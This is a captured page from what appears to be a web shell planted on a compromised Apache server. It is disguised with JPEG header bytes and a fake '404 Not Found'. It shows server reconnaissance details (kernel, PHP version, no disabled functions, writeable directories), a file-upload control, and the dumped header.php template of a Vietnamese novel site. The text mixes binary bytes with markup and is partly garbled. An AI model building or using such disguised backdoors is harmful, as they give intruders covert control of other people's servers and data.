ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/lnovel/layout/novel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/lnovel/layout/novel/header.php
<!DOCTYPE html>
<html lang="vi" itemscope="itemscope" itemtype="https://schema.org/WebPage">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title><?php echo $CORE->title_page;?> - <?php echo $arr_option['blogname'];?></title>
    <base href="<?php echo $INFO['home_url'];?>"/>
    <meta name="robots" content="index,follow">
    <meta content="<?php echo $arr_option['blogdescription'];?>" name="description" />
    <meta content="<?php echo $arr_option['keyword_homepage'];?>" name="keywords" />
    <meta content="thietkewebvumi" name="author" />
    <meta property="og:title" content="<?php echo $CORE->title_page;?> <?php echo $arr_option['blogname'];?>" /><meta property="og:description" content="<?php echo $arr_option['blogdescription'];?>" /><meta property="og:url" content="<?php echo $cur_url;?>" /><meta property="og:site_name" content="<?php echo $CORE->title_page;?> <?php echo $arr_option['blogname'];?>" /><meta property="og:image" content="<?php echo $INFO['home_url'];?><?php echo $arr_option['share_image_website'];?>" /><meta property="og:image:secure_url" content="<?php echo $INFO['home_url'];?><?php echo $arr_option['share_image_website'];?>" /><meta property="og:image:width" content="250" /><meta property="og:image:height" content="320" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="<?php echo $arr_option['blogdescription'];?>" /><meta name="twitter:title" content="<?php echo $CORE->title_page;?> <?php echo $arr_option['blogname'];?>" /><meta name="twitter:image" content="<?php echo $INFO['home_url'];?><?php echo $arr_option['share_image_website'];?>" />
    <link rel="icon" href="<?php echo $INFO['home_url'];?><?php echo $arr_option['icon_website_16_16'];?>" sizes="16x16 32x32" type="image/png">
    <link rel="apple-touch-icon" sizes="180x180" href="<?php echo $INFO['home_url'];?><?php echo $arr_option['icon_website_180_180'];?>">

    <link href="layout/default/node_modules/bootstrap/dist/css/bootstrap.css" rel="stylesheet">
    <link href="layout/default/node_modules/vanillatop/dist/vanillatop.css" rel="stylesheet">
    <link href="layout/default/node_modules/summernote/dist/summernote-bs5.css" rel="stylesheet">
    <link href="layout/default/node_modules/owl.carousel/dist/assets/owl.carousel.css" rel="stylesheet">
    <link href="layout/default/fontawesome5pro/css/all.css?v=5.1.3" rel="stylesheet">

    <link rel="stylesheet" href="/layout/<?php echo $INFO['path_skin'];?>/css/main.css?v=0.0.7">
    <link rel="stylesheet" href="/layout/<?php echo $INFO['path_skin'];?>/css/last-update-list.css">
    <link rel="stylesheet" href="/layout/<?php echo $INFO['path_skin'];?>/css/list_thumb.css">
    <link rel="stylesheet" href="/layout/<?php echo $INFO['path_skin'];?>/css/home.css">
    <link rel="stylesheet" href="/layout/<?php echo $INFO['path_skin'];?>/css/home2.css">
    <link rel="stylesheet" href="/layout/<?php echo $INFO['path_skin'];?>/css/custom.css?v=<?php echo time();?>">

    <script src="layout/default/node_modules/jquery/dist/jquery.js"></script>
    <script src="layout/default/node_modules/@popperjs/core/dist/umd/popper.min.js"></script>
    <script src="layout/default/node_modules/bootstrap/dist/js/bootstrap.js"></script>
    <script src="layout/default/node_modules/summernote/dist/summernote-bs5.js"></script>
    <script src="layout/default/node_modules/owl.carousel/dist/owl.carousel.js"></script>
    <script src="layout/default/fontawesome5pro/js/pro.js?v=5.1.3"></script>
    <script src="layout/<?php echo $INFO['path_skin'];?>/js/custom.js?v=<?php echo time();?>"></script>

    <?php
    if(isset($arr_option['google_analytics']) and !empty($arr_option['google_analytics'])){
        echo str_replace('&#39;',"'",html_entity_decode($arr_option['google_analytics']));
    }
    $arr_vip = array('is_vip'=>'','date_ex'=>'','logo_vip'=>'');
    if(isset($ob_user->user_id) and $ob_user->user_id>0) {
        $arr_vip = check_vip($ob_user->user_id);
        if (!isset($arr_vip) or $arr_vip['is_vip'] != 'active') {
            //ads
            $arr_ads_head = list_ads('head');
            if (isset($arr_ads_head['head']) and !empty($arr_ads_head)) {
                foreach ($arr_ads_head['head'] as $val) {
                    echo str_replace('&#39;', "'", html_entity_decode($val));
                }
            }
        }
    }else{
        //ads
        $arr_ads_head = list_ads('head');
        if (isset($arr_ads_head['head']) and !empty($arr_ads_head)) {
            foreach ($arr_ads_head['head'] as $val) {
                echo str_replace('&#39;', "'", html_entity_decode($val));
            }
        }
    }
    ?>
</head>

ZeroDay Forums Mini